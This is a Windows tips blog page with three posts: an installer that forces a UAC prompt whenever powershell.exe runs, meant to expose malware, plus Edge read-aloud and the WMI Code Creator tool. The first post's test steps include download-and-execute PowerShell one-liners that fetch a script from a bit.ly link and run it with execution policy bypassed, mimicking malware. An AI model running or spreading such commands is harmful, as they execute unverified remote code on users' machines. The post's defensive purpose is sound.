Tuesday, June 19, 2018

Set Powershell.exe command line to run as Administrator as default for Windows 10+ with 1 click installer

This script installs "Powershell.exe Run as Admin Win 10" which will force any command line invocation of Powershell.exe to announce a UAC pop-up asking to run as Administrator privileges. It's a simple way to monitor invocation of scripts from some rogue/hack attempts that uses default powershell.exe command to launch scripts. Clever and recent Powershell malware download there own builds of the poweshell.exe.

The following image of malware is an example is from Trend Micro "Security 101: The Rise of Fileless Threats that Abuse PowerShell" will not work, it will force the UAC pop-up upon using install this.

A code snapshot of macro malware that uses “^” for command shell obfuscation. (using this script will force UAC pop-up)

You can test it for yourself, run this command in Powershell ISE

(New-Object System.Net.WebClient).DownloadFile('https://bit.ly/Readkeyps1',"$env:temp\Readkey.ps1"); & "$env:temp\Readkey.ps1" -u

it will run and wait for a key to be pressed. https://bit.ly/Readkeyps1 downloads Readkey.ps1

Or this command past into choose Windows Start->RUN  (simulate use by malware) 

cmd.exe /c powershell.exe -executionpolicy bypass -command "(New-Object System.Net.WebClient).DownloadFile('http://bit.ly/Readkeyps1',\"$env:temp\Readkey.ps1\"); & \"$env:temp\Readkey.ps1\" -u"

-WindowStyle Hidden is removed because it would hide the input key Powershell window. 

After install of this script, you'll get UAC pop-up (see image below).

Also run a script from CMD line will not run, because the ".\" (current directory)  will no be passed correctly. For example, powershell .\Helloworld.ps1

will fail from any other directory that C:\windows and 2 directories below.

Setting Privileged Level is not accessible otherwise via Properties window in these default Windows 10+ directories;

  • x64 DIRECTORY - C:\Windows\System32\WindowsPowerShell\v1.0\ 
  • x32 DIRECTORY - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\

In Windows 10 the Compatibility tab is not available
This utility has the following features; 

This .inf installer copies the current default Powershell.exe location to C:\Windows\Powershell.exe, to become new default windows Powershell.exe that will be run.
Does not install any software, just sets some registry settings to enable the registry setting. Additionally,  it provides a proper uninstall option.

  • Works in Windows 10(and  equivalent Server versions).
  • comes with proper uninstaller located in "Add or Remove Programs" or Programs and Features
↓ PowershellexeRunAsAdminWin10BatFile.zip
Install 64-bits Only

Prerequisite:  Your user account must be part Administrators group or you know Administrator password to install. 
1. Tip! Back-up your registry as a precaution.

2. Download and Unzip file PowershellexeRunAsAdminWin10BatFile.zip

3. Simply, right-click on
    and Run as administratorthat's it.


The great thing about this script file, is it creates a uninstall option.

Search for "Add or Remove Programs" or goto Programs and Features, and right-click on the "Powershell.exe Run as Admin Win 10 (Uninstall only)" and choose Uninstall to completely remove.

Windows Major Updates

You may have to reinstall this to run any updates to Powershell platform.

Similar Utilities of Interest

Run Powershell.exe As Administrator Installer for Windows 7 or less

Edit in Notepad As Administrator Shortcut to the File Context Menu in Windows 10

Shutdown, Restart, Log-off, Hibernate, Lock Workstation, Switch User Start Tiles for Windows 8/8.1/10 featuring new Metro Icons

Administrative Tools Metro Tile, Control Panel "God Mode" Metro Tile, Windows Update Metro Tile , Windows Explorer Search Metro Tile for Windows 8.1,10 

Saturday, June 16, 2018

Read aloud an eBook, PDF or Web Page in Windows 10 with Edge Browser

Edge Browser can read aloud eBooks, PDFs and Web Pages in Windows 10.

Hear it in action 

Here's how you can adjust the reading speed in Edge Browser.

Here's how you read a The Project Gutenberg EBook of The Iliad of Homer by Homer PDF.

Friday, June 15, 2018

Write Powershell Scripts Faster and easily Explore Windows Management Infrastructure Win32_Classes with WMI Code Creator utility

As a Poweshell developer your number one querying information source is the Windows Management Instrumentation (WMI), which gives you access to a wealth of management information operations on Windows-based operating systems. But WMI this has been updated to MI.

The Windows Management Infrastructure (MI) features represent the latest version of the Windows Management Instrumentation (WMI) technologies introduced in Windows 8 and Windows Server 2012 for new ways of creating Windows Management Infrastructure (MI) applications. MI is fully compatible with previous versions of WMI and provides a host of features and benefits that make designing and developing providers and clients easier. The new providers are prefixed with Win32_. 

For example, Win32_ComputerSystem inherits from the old CIM_UnitaryComputerSystem.

Win32 Provider contains 682+ classes, so how to learn about these classes quickly. 

A quick Powershell 1 liner to count Win32 classes
@(gwmi -list | where {$_.__class -match "Win32"}).Count

WMI Code Creator is a free utility from an Microsoft Technet Magazine to do just that.

Download WMI Code Creator (122KB)

Here's the WMI Code Creator GUI and how to explorer the Win32_ providers which lives under namespace "root\CIMv2".

Want to find out what a specific field formal definition is and means ? 

Once you happy, you can now Generate Code with a Where clause by clicking "Search for Property Values" button and selecting the where value "Manufacturer=LENOVO" to appear in the Generate Code window. 

If this new code does not show up you may have to regenerate the code by selecting Code Language sub-menu with your language selection.

Press Execute Code button to get your results! 

WMI Code Creator  is a amazing toool to save you time writing administrative scripts and code. Koodos to Chris Scoville, the developer and a programming writer in the Windows Server Developer Documentation group at Microsoft.